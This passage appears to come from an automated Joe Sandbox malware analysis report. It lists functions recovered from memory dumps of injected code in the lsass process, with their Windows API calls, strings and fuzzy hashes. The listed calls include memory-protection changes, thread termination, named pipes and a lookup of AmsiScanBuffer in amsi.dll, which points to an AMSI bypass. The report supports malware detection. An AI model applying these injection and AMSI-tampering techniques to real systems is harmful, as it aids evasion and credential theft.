Instruction Fuzzy Hash: 63D19036208F8C81DA71DB1AF49439A77B0F788B94F684156EA8D87769DF3DC592CB00

Function 0000017D2DD52098 Relevance: 9.1, APIs: 6, Instructions: 113threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 0000017D2DD520A6
TlsFree.KERNEL32 ref: 0000017D2DD5225F
TlsFree.KERNEL32 ref: 0000017D2DD5226B
TlsFree.KERNEL32 ref: 0000017D2DD52277
TlsFree.KERNEL32 ref: 0000017D2DD52283
TlsFree.KERNEL32 ref: 0000017D2DD5228F

Part of subcall function 0000017D2DD55E50: GetCurrentThreadId.KERNEL32 ref: 0000017D2DD55E66

Memory Dump Source

Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true

Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd

Similarity

API ID: Free$CurrentThread
String ID:
API String ID: 564911740-0
Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
Instruction ID: b487a383841d198bad61ad671097e45e90b99253259c84bcebb8eb2ffb1bb39e
Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
Instruction Fuzzy Hash: EB51AF35209F4995FB06DF68FC913D823B1BF04744F885915A92D067AAEFB8D5ABC380

Function 0000017D2DD82098 Relevance: 9.1, APIs: 6, Instructions: 113threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 0000017D2DD820A6
TlsFree.KERNEL32 ref: 0000017D2DD8225F
TlsFree.KERNEL32 ref: 0000017D2DD8226B
TlsFree.KERNEL32 ref: 0000017D2DD82277
TlsFree.KERNEL32 ref: 0000017D2DD82283
TlsFree.KERNEL32 ref: 0000017D2DD8228F

Part of subcall function 0000017D2DD85E50: GetCurrentThreadId.KERNEL32 ref: 0000017D2DD85E66

Memory Dump Source

Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true

Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd

Similarity

API ID: Free$CurrentThread
String ID:
API String ID: 564911740-0
Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
Instruction ID: 27a1c99efeec3cb794feec5d7b4da393125b1e5fb9a04dfefcbd617b1c2e0317
Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
Instruction Fuzzy Hash: C4519135209F4995EA06DB24FC903D823B1BF04744F9C8925E52D877A6EF78C99BC340

Function 0000017D2DD535C8 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,?,?,0000017D2DD524D1), ref: 0000017D2DD535EB
HeapAlloc.KERNEL32(?,?,?,?,?,0000017D2DD524D1), ref: 0000017D2DD535FE
StrCmpNIW.SHLWAPI(?,?,?,?,?,0000017D2DD524D1), ref: 0000017D2DD53673
GetProcessHeap.KERNEL32(?,?,?,?,?,0000017D2DD524D1), ref: 0000017D2DD536D9
HeapFree.KERNEL32(?,?,?,?,?,0000017D2DD524D1), ref: 0000017D2DD536E7

Strings

$nya-, xrefs: 0000017D2DD5366C

Memory Dump Source

Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true

Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: $nya-
API String ID: 756756679-1266920357
Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction ID: e44f6ab9cc7e4a7ef97263a8d5e3176e6a8d105c8800c8036b3f4b44f3aa658b
Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction Fuzzy Hash: 8D316B32709F5987EA15DF16B9446A9A3B0BF54B84F0C4428DF8C47B56EF78C4E28740

Function 0000017D2DD835C8 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,?,?,0000017D2DD824D1), ref: 0000017D2DD835EB
HeapAlloc.KERNEL32(?,?,?,?,?,0000017D2DD824D1), ref: 0000017D2DD835FE
StrCmpNIW.SHLWAPI(?,?,?,?,?,0000017D2DD824D1), ref: 0000017D2DD83673
GetProcessHeap.KERNEL32(?,?,?,?,?,0000017D2DD824D1), ref: 0000017D2DD836D9
HeapFree.KERNEL32(?,?,?,?,?,0000017D2DD824D1), ref: 0000017D2DD836E7

Strings

$nya-, xrefs: 0000017D2DD8366C

Memory Dump Source

Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true

Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: $nya-
API String ID: 756756679-1266920357
Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction ID: 29272d6e91c5288529aca49cada390d535d8c615be63cd6586ba71387043ab1f
Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction Fuzzy Hash: B5314A32709F5993EA56DF1AB9417A963B0BF54B84F1C4420CE8E87B56EB35C4A78700

Function 0000017D2DD5C940 Relevance: 9.1, APIs: 6, Instructions: 51COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 0000017D2DD5C94F
SetLastError.KERNEL32 ref: 0000017D2DD5C96E
FlsSetValue.KERNEL32 ref: 0000017D2DD5C997
FlsSetValue.KERNEL32 ref: 0000017D2DD5C9A8
FlsSetValue.KERNEL32 ref: 0000017D2DD5C9B9

Part of subcall function 0000017D2DD5D2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,0000017D2DD5674A), ref: 0000017D2DD5D2B6
Part of subcall function 0000017D2DD5D2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,0000017D2DD5674A), ref: 0000017D2DD5D2C0

SetLastError.KERNEL32 ref: 0000017D2DD5C9DC

Memory Dump Source

Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true

Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd

Similarity

API ID: ErrorLast$Value$FreeHeap
String ID:
API String ID: 365477584-0
Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
Instruction ID: d555153932640f8d0347a3364c120d1ec568d657c151868c23cbfcce845ca8fc
Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
Instruction Fuzzy Hash: B2113D31218B4842FA14673578117EA2271AF857A1F9C4624E96E967CBDEB8C4C34641

Function 0000017D2DD8C940 Relevance: 9.1, APIs: 6, Instructions: 51COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 0000017D2DD8C94F
SetLastError.KERNEL32 ref: 0000017D2DD8C96E
FlsSetValue.KERNEL32 ref: 0000017D2DD8C997
FlsSetValue.KERNEL32 ref: 0000017D2DD8C9A8
FlsSetValue.KERNEL32 ref: 0000017D2DD8C9B9

Part of subcall function 0000017D2DD8D2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,0000017D2DD8674A), ref: 0000017D2DD8D2B6
Part of subcall function 0000017D2DD8D2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,0000017D2DD8674A), ref: 0000017D2DD8D2C0

SetLastError.KERNEL32 ref: 0000017D2DD8C9DC

Memory Dump Source

Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true

Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd

Similarity

API ID: ErrorLast$Value$FreeHeap
String ID:
API String ID: 365477584-0
Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
Instruction ID: 0c1b4050e8ce30b04da2630d2d33d5fd89b30ba98cbf773207519ce4282eae62
Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
Instruction Fuzzy Hash: 3311303120DB5882F6167B3578117EE61719F857A0FBC4664A86ED67CBDE38C4834200

Function 0000017D2DD51A30 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 0000017D2DD51A56
K32GetModuleFileNameExW.KERNEL32 ref: 0000017D2DD51A74
PathFindFileNameW.SHLWAPI ref: 0000017D2DD51A83
lstrlenW.KERNEL32 ref: 0000017D2DD51A8F
StrCpyW.SHLWAPI ref: 0000017D2DD51AA2
CloseHandle.KERNEL32 ref: 0000017D2DD51AB0

Memory Dump Source

Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true

Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
Instruction ID: 5d1b500fe26d28fa52f1e2ea028b920d62cefd2ec870b9f025740f9f7ca69692
Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
Instruction Fuzzy Hash: 36010535708B8886EB24DB12B85839962B1FB88FC0F8840359E9D43759DE79C9CAC7C0

Function 0000017D2DD81A30 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 0000017D2DD81A56
K32GetModuleFileNameExW.KERNEL32 ref: 0000017D2DD81A74
PathFindFileNameW.SHLWAPI ref: 0000017D2DD81A83
lstrlenW.KERNEL32 ref: 0000017D2DD81A8F
StrCpyW.SHLWAPI ref: 0000017D2DD81AA2
CloseHandle.KERNEL32 ref: 0000017D2DD81AB0

Memory Dump Source

Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true

Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
Instruction ID: bb84f0682f540ad4f0bdb9ac2566f196a67579b3d20ff375e3b3dbbd181199c3
Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
Instruction Fuzzy Hash: 93010931708B4486EA24DF12B8583D963B1FB88BC0F5C41359E5D83755DE39C58B8740

Function 0000017D2DD53E14 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,0000017D2DD53AAC), ref: 0000017D2DD53E30
GetCurrentProcess.KERNEL32(?,?,?,?,?,0000017D2DD53AAC), ref: 0000017D2DD53E3E
VirtualProtectEx.KERNEL32(?,?,?,?,?,0000017D2DD53AAC), ref: 0000017D2DD53E60
GetCurrentProcess.KERNEL32(?,?,?,?,?,0000017D2DD53AAC), ref: 0000017D2DD53E7E
VirtualProtectEx.KERNEL32(?,?,?,?,?,0000017D2DD53AAC), ref: 0000017D2DD53E9F
TerminateThread.KERNEL32(?,?,?,?,?,0000017D2DD53AAC), ref: 0000017D2DD53EAE

Memory Dump Source

Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true

Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
Instruction ID: be16916117c4c5d8465fbac92c3bfb4ddd2eef5abb0f374461f5f83441254e7b
Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
Instruction Fuzzy Hash: 1E014C75219F4882FB249B61F84879973B0BF49B45F080128DA8D073AAEF3DC0DAC780

Function 0000017D2DD83E14 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,0000017D2DD83AAC), ref: 0000017D2DD83E30
GetCurrentProcess.KERNEL32(?,?,?,?,?,0000017D2DD83AAC), ref: 0000017D2DD83E3E
VirtualProtectEx.KERNEL32(?,?,?,?,?,0000017D2DD83AAC), ref: 0000017D2DD83E60
GetCurrentProcess.KERNEL32(?,?,?,?,?,0000017D2DD83AAC), ref: 0000017D2DD83E7E
VirtualProtectEx.KERNEL32(?,?,?,?,?,0000017D2DD83AAC), ref: 0000017D2DD83E9F
TerminateThread.KERNEL32(?,?,?,?,?,0000017D2DD83AAC), ref: 0000017D2DD83EAE

Memory Dump Source

Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true

Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
Instruction ID: ca46c63c5d18c53185b5cdb7a32bf992922f0920b67cfdb09ddb75aa79a086e2
Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
Instruction Fuzzy Hash: AA015B74209F4882EB259F61F84939562B0BF44B81F1C0024C98D473AAEF3EC0CA8700

Function 0000017D2DD81AD4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 0000017D2DD81AF4
StrCmpNIW.SHLWAPI ref: 0000017D2DD81B0E
lstrlenW.KERNEL32 ref: 0000017D2DD81B1D
StrCpyW.SHLWAPI ref: 0000017D2DD81B32

Strings

\\?\, xrefs: 0000017D2DD81B02

Memory Dump Source

Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true

Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
Instruction ID: 2eb15a5bc3a6d21b9791a6b655a5d988196bfcc20eedcd2072bb57e23a5e5de7
Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
Instruction Fuzzy Hash: 09F0317230CB8992EB208F25F5943D96371FB45B88FCC41219A4D47559DE6DD6DAC700

Function 0000017D2DD53708 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI(?,?,00000000,0000017D2DD5275A), ref: 0000017D2DD5372A
StrCpyW.SHLWAPI ref: 0000017D2DD5373A
StrCatW.SHLWAPI ref: 0000017D2DD53746
PathCombineW.SHLWAPI(?,?,00000000,0000017D2DD5275A), ref: 0000017D2DD53754

Strings

\\.\pipe\, xrefs: 0000017D2DD53720

Memory Dump Source

Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true

Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction ID: 549d6b3f5c5617265924b4db8807741ab2b98ea511b45a10dbd99b22b46e9c1f
Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction Fuzzy Hash: F1F08CB4708F8982EA148B13B914199A670BF48FC0F4C8430EE4E07B1ADE6CC4C78780

Function 0000017D2DD5B904 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 0000017D2DD5B929
GetProcAddress.KERNEL32 ref: 0000017D2DD5B93F
FreeLibrary.KERNEL32 ref: 0000017D2DD5B95B

Strings

mscoree.dll, xrefs: 0000017D2DD5B920
CorExitProcess, xrefs: 0000017D2DD5B938

Memory Dump Source

Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true

Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
Instruction ID: c7a77935cd3ff50cc22bbf61a466c25b5755c83e5add7d4d4005042facc3e205
Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
Instruction Fuzzy Hash: 18F09071208F4981EB108B24F8843A96330EF89760F5C0219DA7E455E6CF3CC4CAC7C0

Function 0000017D2DD83708 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI(?,?,00000000,0000017D2DD8275A), ref: 0000017D2DD8372A
StrCpyW.SHLWAPI ref: 0000017D2DD8373A
StrCatW.SHLWAPI ref: 0000017D2DD83746
PathCombineW.SHLWAPI(?,?,00000000,0000017D2DD8275A), ref: 0000017D2DD83754

Strings

\\.\pipe\, xrefs: 0000017D2DD83720

Memory Dump Source

Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true

Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction ID: 78cd014133c63159269700181b9a36818e7f1613a5d49972043bba406d45004b
Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction Fuzzy Hash: 09F05E7470CF8892EA048F13B9142D96370AF48FC0F5C8530EE4E47B1ACE28C4878700

Function 0000017D2DD8B904 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 0000017D2DD8B929
GetProcAddress.KERNEL32 ref: 0000017D2DD8B93F
FreeLibrary.KERNEL32 ref: 0000017D2DD8B95B

Strings

mscoree.dll, xrefs: 0000017D2DD8B920
CorExitProcess, xrefs: 0000017D2DD8B938

Memory Dump Source

Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true

Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
Instruction ID: 69109c6d7863e4eb3efc4ffe6a61c66adcc268e62ce0f96a583f3346558dca83
Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
Instruction Fuzzy Hash: 64F06D3120CF4981EA109F24F8853E92330AF897A0F9C0229DA6E465E6CF2AC48AC300

Function 0000017D2DD81E3C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 13librarysleeploaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 0000017D2DD81E47
GetProcAddress.KERNEL32 ref: 0000017D2DD81E57
Sleep.KERNEL32 ref: 0000017D2DD81E67

Strings

AmsiScanBuffer, xrefs: 0000017D2DD81E50
amsi.dll, xrefs: 0000017D2DD81E40

Memory Dump Source

Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true

Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
